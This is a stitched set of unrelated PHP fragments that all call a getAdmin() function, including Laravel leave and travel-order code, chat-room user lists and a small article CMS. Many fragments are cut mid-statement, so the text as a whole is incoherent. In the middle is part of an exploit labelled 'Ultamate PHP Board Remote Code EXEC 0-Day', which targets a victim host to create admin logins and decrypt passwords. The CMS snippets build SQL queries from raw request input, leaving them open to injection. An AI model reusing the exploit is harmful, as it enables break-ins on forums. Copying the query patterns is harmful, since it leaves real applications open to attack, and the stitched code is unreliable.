public function create(User $user, TravelOrder $travel)
{
$employee = $user->employee;
if ($user->isFinanceDirector() && getAdmin()) {
return true;
}
if ($employee->approval_heirarchy && $employee->utility->can_file_travel_order && HumanResource::financeDirector()) {
return true;
}
return false;
}
public static function boot()
{
parent::boot();
static::created(function ($employee) {
$employee->leave_credit()->save(new EmployeeLeaveCredit());
$employee->accumulated_leave()->save(new EmployeeAccumulatedLeave());
$employee->notifications()->create(['sent_to' => getAdmin()->id, 'sent_by' => $employee->user->id, 'subject' => 'Personal Data Sheet', 'message' => trans('notification.employee-created', ['name' => $employee->fullName()]), 'icon' => 'user', 'color' => 'purple']);
});
static::updated(function ($employee) {
$employee->notifications()->create(['sent_to' => getAdmin()->id, 'sent_by' => $employee->user->id, 'subject' => 'Personal Data Sheet', 'message' => trans('notification.employee-updated', ['name' => $employee->fullName()]), 'icon' => 'user', 'color' => 'purple']);
});
}
/**
* Execute the command.
*
* @return void
*/
public function handle()
{
foreach (Training::where('start', Carbon::today())->get() as $training) {
$training->employees->each(function ($employee) use($training) {
$training->notifications()->create(['sent_to' => $employee->user->id, 'sent_by' => getAdmin()->id, 'subject' => 'Trainings and Seminar', 'message' => $training->title . ' is scheduled to start today!', 'icon' => 'calendar', 'color' => 'primary']);
});
}
foreach (Training::where('end', Carbon::today())->get() as $training) {
$training->employees->each(function ($employee) use($training) {
$training->notifications()->create(['sent_to' => $employee->user->id, 'sent_by' => getAdmin()->id, 'subject' => 'Trainings and Seminar', 'message' => $training->title . ' is scheduled to end today! Share us your thoughts.', 'icon' => 'calendar', 'color' => 'primary']);
});
}
$this->info('Participants are all notified!');
}
function addTask($kan_task, $project_id)
{
$user = getAdmin();
$task = ManiphestTask::initializeNewTask($user);
$changes = array();
$transactions = array();
$changes[ManiphestTransaction::TYPE_TITLE] = $kan_task['title'];
$changes[ManiphestTransaction::TYPE_DESCRIPTION] = $kan_task['description'];
$changes[ManiphestTransaction::TYPE_STATUS] = ManiphestTaskStatus::getDefaultStatus();
$changes[PhabricatorTransactions::TYPE_COMMENT] = null;
$project_type = PhabricatorProjectObjectHasProjectEdgeType::EDGECONST;
$transactions[] = id(new ManiphestTransaction())->setTransactionType(PhabricatorTransactions::TYPE_EDGE)->setMetadataValue('edge:type', $project_type)->setNewValue(array('=' => array_fuse(array($project_id))));
$template = new ManiphestTransaction();
foreach ($changes as $type => $value) {
$transaction = clone $template;
$transaction->setTransactionType($type);
$transaction->setNewValue($value);
$transactions[] = $transaction;
}
$editor = id(new ManiphestTransactionEditor())->setActor($user)->setContentSourceFromConduitRequest(new ConduitAPIRequest(array()))->setContinueOnNoEffect(true);
$editor->applyTransactions($task, $transactions);
}
</div>
</div>
<div class="top_navigation">
<ul class="top_navigation_link_container">
<li><a href="<?php
echo $absoluteURL . "admin.space/";
?>
" target="_top">Home</a></li>
<li style="background-image:none"><a href="<?php
echo $absoluteURL . "admin.space/login/logout.php";
?>
" target="_top">Log out</a></li>
</ul>
<div class="back_end_name"><?php
echo GetSetting('BackendName');
?>
</div>
</div>
<div class="top_sub_navigation">You are logged in as <strong><?php
echo ucfirst(getAdmin($_SESSION['admin_login']));
?>
</strong>. Not you, please
<strong><a href="<?php
echo $absoluteURL . "admin.space/login/logout.php";
?>
" target="_top">Sign out</a></strong></div>
</div>
</body>
</html>
<!-- The navbar at the top of the page -->
<div id="admin-navbar">
<ul>
<a href="admin.php" ><li class="admin-current">Administrator Panel</li></a>
<a href="manage_users.php"><li>Manage Users</li></a>
<a href="manage_listings.php"><li>Manage Listings</li></a>
<a href="logout.php" style="float:right;"><li>Logout</li></a>
</ul>
</div>
<!-- Main content of page: -->
<div id="mainForm">
<h1>Administrator Panel</h1>
<h3>Welcome <?php
echo getAdmin($dbc, $pid);
?>
!</h3>
<p> Click the tabs above to manage administrator accounts or manage listings.</p>
</div>
</body>
</html>
<?php
} else {
# Redirect to login since user is not logged in:
header('Location: admin_login.php');
die("Unauthorized User!");
}
if (!ctype_alnum(str_replace(" ", "", $checkMessage[3]))) {
die("text family is invalid");
}
// is IRC numeric?
if ($checkMessage[5] && !is_numeric($checkMessage[5])) {
die("IRC value is invalid");
}
// is linebreaks numeric?
if ($checkMessage[6] && !is_numeric($checkMessage[6])) {
die("linebreak value is invalid");
}
// is message shared? (eg. broadcast)
if (stristr($checkMessage[4], "BROADCAST") && getAdmin($_SESSION['username']) || stristr($checkMessage[4], "BROADCAST") && getModerator($_SESSION['username'])) {
$share = '1';
}
if (stristr($checkMessage[4], "BROADCAST") && !getAdmin($_SESSION['username']) && stristr($checkMessage[4], "BROADCAST") && !getModerator($_SESSION['username'])) {
die("incorrect permissions");
}
}
// if intelli-bot is enabled
if ($CONFIG['intelliBot'] && !$_POST['uname'] && $_SESSION['username']) {
$senderName = $CONFIG['intelliBotName'];
} else {
$senderName = $_SESSION['username'];
}
// if user is not silenced
if (!$_SESSION['silenceStart'] || $_SESSION['silenceStart'] < date("U") - $CONFIG['silent'] * 60) {
unset($_SESSION['silenceStart']);
if (!$senderName || empty($senderName)) {
die("invalid username");
}
*/
$_badwords = implode("|", badChars());
$_badwords = str_replace("'", "\\'", $_badwords);
echo "var badChars = '" . $_badwords . "'; ";
/*
* assign admin status
*
*/
if (isset($_SESSION['adminUser'])) {
unset($_SESSION['adminUser']);
}
/*
* user status
*
*/
echo "var admin = " . getAdmin($_SESSION['username']) . "; ";
echo "var moderator = " . getModerator($_SESSION['username']) . "; ";
echo "var speaker = " . getSpeaker($_SESSION['username']) . "; ";
/*
* user messages
*
*/
echo "var mBold = " . $CONFIG['text']['bold'] . "; ";
echo "var mItalic = " . $CONFIG['text']['italic'] . "; ";
echo "var mUnderline = " . $CONFIG['text']['underline'] . "; ";
echo "var textColor = '" . $CONFIG['text']['color'] . "'; ";
echo "var textSize = '" . $CONFIG['text']['size'] . "'; ";
echo "var textFamily = '" . $CONFIG['text']['family'] . "'; ";
/*
* system messages
*
} else {
if (isset($_REQUEST['addVict'])) {
$url_parsed = parse_url($_REQUEST['addVict']);
if (empty($url_parsed['scheme'])) {
$url_parsed = parse_url('http://' . $url);
}
$rtn['url'] = $url_parsed;
$victPort = $url_parsed["port"];
if (!$port) {
$victPort = 80;
}
$victPath = $url_parsed["path"];
$victHost = $url_parsed["host"];
$exp_user_env = $_REQUEST["addName"];
$exp_pass_env = t_encrypt($_REQUEST["addPass"], $v1_xKey);
getAdmin($victHost, $victPort, $victPath, $exp_user_env, $exp_pass_env, 4000000000 + rand(0, 300000000));
print "<title> Ultamate PHP Board Remote Code EXEC 0-Day </title>";
print "<CENTER><B> Admin login Name:" . $_REQUEST["addName"] . "</B></CENTER>";
//this exploit code suffers from xss!
print "<CENTER><B> Admin login Password:"******"addPass"] . "</B></CENTER>";
exit;
} else {
if (isset($_REQUEST['decrypt'])) {
print "<I>ecrypted password:</I>";
print "<CENTER>" . $_REQUEST["decrypt"] . "</CENTER>";
print "<B>Decrypted password:</B>";
print "<CENTER><B>" . t_decrypt($_REQUEST["decrypt"], $v1_xKey) . "</B></CENTER>";
exit;
} else {
if (isset($_REQUEST['encrypt'])) {
print "<I>ecrypted password:</I>";
if ($_REQUEST['s']) {
$singleRoom = "AND room = '" . makeSafe($_GET['roomID']) . "'";
}
// get users within last 5 mins
$onlineTime = getTime() - 300;
// check user activity
$offlineTime = getTime() - $CONFIG['activeTimeout'];
$tmp = mysql_query("\n\tSELECT id, username, userid, prevroom, room, avatar, webcam, active, online, status, watching, eCredits, guest, lastActive, userIP \n\tFROM prochatrooms_users \n\tWHERE username != '' \n\tAND active > '" . $onlineTime . "'\n\t" . $singleRoom . "\n\tGROUP BY room, username ASC\n\t") or die(mysql_error());
while ($i = mysql_fetch_array($tmp)) {
$showAllUsers = 1;
if (invisibleAdmins($i['username'])) {
$showAllUsers = 0;
}
if ($showAllUsers == 1) {
$iAdmin = 0;
if (getAdmin($i['username'])) {
$iAdmin = 1;
}
$iModerator = 0;
if (getModerator($i['username'])) {
$iModerator = 1;
}
$iSpeaker = 0;
if (getSpeaker($i['username'])) {
$iSpeaker = 1;
}
$i['userid'] = empty($i['userid']) ? "0" : $i['userid'];
$i['room'] = empty($i['room']) ? "0" : $i['room'];
$xml .= '<userlist>';
$xml .= '<id>' . $i['id'] . '</id>';
$xml .= '<userid>' . stripslashes($i['userid']) . '</userid>';
<?php
/**
* Created by PhpStorm.
* User: henrymacbook1
* Date: 22-10-15
* Time: 18:41
*/
session_start();
include_once "include/config.php";
include_once 'include/functions.php';
getHeader($description = "Edit article");
getAdmin("Edit Article");
$id = $_GET['id'];
if (@$_GET['action'] == "save") {
$article_title = $_POST['article_title'];
$article_summery = $_POST['article_summery'];
$article_content = $_POST['article_content'];
$publication_date = $_POST['publication_date'];
$db = mysqli_connect(HOST, USER, PASSWORD, DATABASE);
$query = "UPDATE `article` SET `article_title`='{$article_title}',`article_summery`='{$article_summery}',`article_content`='{$article_content}',`publication_date`='{$publication_date}' WHERE `article_id`='{$id}'";
mysqli_query($db, $query);
echo "article: {$article_title} is updated in the database";
header("location: admin.php");
exit;
} else {
$db = mysqli_connect(HOST, USER, PASSWORD, DATABASE);
$query = "SELECT * FROM `article` WHERE `article_id` = '{$id}'";
$result = mysqli_query($db, $query);
while ($rij = mysqli_fetch_array($result)) {
$id = $rij['article_id'];
<?php
/**
* Created by PhpStorm.
* User: henrymacbook1
* Date: 22-10-15
* Time: 17:40
*/
session_start();
include_once "include/config.php";
include_once 'include/functions.php';
getHeader($description = "new article");
getAdmin("New Article", "DTT Multimedia");
if (@$_GET['action'] == "save") {
$article_title = $_POST['article_title'];
$article_summery = $_POST['article_summery'];
$article_content = $_POST['article_content'];
$publication_date = $_POST['publication_date'];
$db = mysqli_connect(HOST, USER, PASSWORD, DATABASE);
$query = "INSERT INTO `article`(`article_id`, `article_title`, `article_summery`, `article_content`, `publication_date`)\n VALUES ('', '{$article_title}', '{$article_summery}', '{$article_content}','{$publication_date}')";
// echo $query;
mysqli_query($db, $query);
echo "article: {$article_title} is added ";
header("location: admin.php");
} else {
?>
<article id="tableArticle">
<form name="articleNew" action="<?php
echo $_SERVER['PHP_SELF'];
?>
?action=save" method="post">
<?php
session_start();
if (!isset($_SESSION["loged"])) {
$html = file_get_contents("../session_error.html");
} else {
require_once "../../config.php";
require_once "../../dist/class/class.connect.php";
require_once "../../dist/functions/data.access.admin.php";
$c_host = $databaselocation;
$c_user = $databaseuser;
$c_pass = $databasepass;
$c_db = $databasename;
//RESTRINGIR SI ES UN USUARIO ADMIN
$user = $_SESSION["userid"];
$admin = getAdmin($user);
$admin = $admin[0];
if (!$admin) {
$html = file_get_contents("admin_error.html");
} else {
$username = $_SESSION["username"];
$html = file_get_contents("versions.html");
$html = str_replace("{USERNAME}", $username, $html);
$versiones = getVersiones();
$html_versiones = "";
$contador = 0;
foreach ($versiones as $version) {
$html_versiones .= "<tr><td>" . ++$contador . "</td><td>" . utf8_encode($version->comentario) . "</td><td>" . utf8_encode($version->fecha) . "</td></tr>";
}
$html = str_replace("{VERSIONES}", $html_versiones, $html);
}
/**
* @param Request $request
*/
public function store(Request $request)
{
$validator = $this->validator($request->all());
if ($request->user()->can('create', new EmployeeLeave())) {
if ($validator->fails()) {
return redirect()->back()->withInput()->withErrors($validator);
}
$employee = $request->user()->employee;
$approvals = $employee->approval_heirarchy;
$leave = $request->all();
// Add recommending approval or set status to recommended
$leave = $approvals->recommending_approval ? array_add($leave, 'recommending_approval_id', $approvals->recommending_approval->id) : array_add($leave, 'status', 'recommended');
$leave = array_add($leave, 'approved_by_id', $approvals->approved_by ? $approvals->approved_by->id : null);
$leave = array_add($leave, 'certified_by_id', getAdmin()->employee->id);
$leave = new EmployeeLeave($leave);
if ($request->user()->can('store', $leave)) {
$leave = $employee->employee_leaves()->save($leave);
flash()->success('Your leave application is sent. Please wait for confirmation');
return redirect()->to('/leave/personal');
}
flash()->warning('You are already out of credits!');
return redirect()->back();
}
flash()->error('Oopps! You are trying to breach our security!');
return redirect()->to('/');
}
<?php
/**
* Created by PhpStorm.
* User: henrymacbook1
* Date: 22-10-15
* Time: 22:22
*/
session_start();
include_once 'include/config.php';
include_once 'include/functions.php';
getHeader("adminpage", "DTT Multimedia");
getAdmin();
$db = mysqli_connect(HOST, USER, PASSWORD, DATABASE);
$query = "SELECT * FROM `article`";
$result = mysqli_query($db, $query);
echo "\n <div id='adminTable'>\n <table>\n <tr>\n <th>Publication Date</th>\n <th>Article</th>\n <th>edit</th>\n <th>Delete</th>\n </tr>\n <br>";
while ($rij = mysqli_fetch_array($result)) {
$id = $rij['article_id'];
$publication_date = $rij['publication_date'];
$article_title = $rij['article_title'];
echo "<tr>\n <td>{$publication_date}</td>\n <td>{$article_title}</td>\n <td><a href=\"articleEdit.php?&id={$id}\"><img src=\"../image/edit.jpg\"></a></td>\n <td><a href=\"articleDelete.php?action=delete&id={$id}\"><img src=\"../image/delete.jpg\"></a></td>\n </tr>";
}
echo "\n</div>\n</table>";
getCount();
addArticle();
getFooter();
<?php
$results = getUser();
foreach ($results as $result) {
echo '<li id="' . $result['id'] . '_' . $result['role'] . '">' . $result['login'] . '<span class="a" onclick="redirect(\'/admin.php?a=userInfo\', getUserInfo(' . $result['id'] . '))" >Edit</span></li>';
}
?>
</ul>
</div>
<?php
if ($_SESSION['role'] > 4) {
?>
<div class="role">
<h2>Administrateurs</h2>
<ul id="admin">
<?php
$results = getAdmin();
foreach ($results as $result) {
echo '<li id="' . $result['id'] . '_' . $result['role'] . '">' . $result['login'] . '<span class="a" onclick="redirect(\'/admin.php?a=userInfo\', getUserInfo(' . $result['id'] . '))" >Edit</span></li>';
}
?>
</ul>
</div>
<?php
}
if ($_SESSION['role'] > 3) {
?>
<div class="role">
<h2>Officiers</h2>
<ul id="officer">
<?php
$results = getOfficer();
/**
* Store a newly created resource in storage.
*
* @param Request $request
* @return Response
*/
public function store(Request $request)
{
if ($this->validator($request->all())->fails()) {
flash()->error('Please fill the missing fields.');
return redirect()->back()->withInput();
} else {
$approvals = $request->user()->employee->approval_heirarchy;
$leave = $request->all();
if ($approvals->recommending_approval) {
$leave = array_add($leave, 'recommending_approval_id', $approvals->recommending_approval->id);
} else {
$leave = array_add($leave, 'status', 'recommended');
}
$leave = array_add($leave, 'approved_by_id', $approvals->approved_by ? $approvals->approved_by->id : null);
$leave = array_add($leave, 'certified_by_id', getAdmin()->employee->id);
$leave = new EmployeeSpecialLeave($leave);
if (Gate::allows('store', $leave)) {
$leave = $this->user->employee->employee_special_leaves()->save($leave);
if ($leave) {
write_form(new WriteSpecialLeaveForm($leave));
flash()->success('Leave request sent. Please wait for the confirmation.');
return redirect()->to('/leave/personal');
}
}
flash()->error('An unknown error occured!.');
return redirect()->to('/dashboard');
}
}
function invisibleAdmins($username)
{
// include files
include getDocPath() . "includes/config.php";
$result = '0';
if ($CONFIG['invisibleAdminsPlugin']) {
if (file_exists(getDocPath() . "plugins/invisible/index.js.php")) {
$result = getAdmin($username);
}
}
return $result;
}
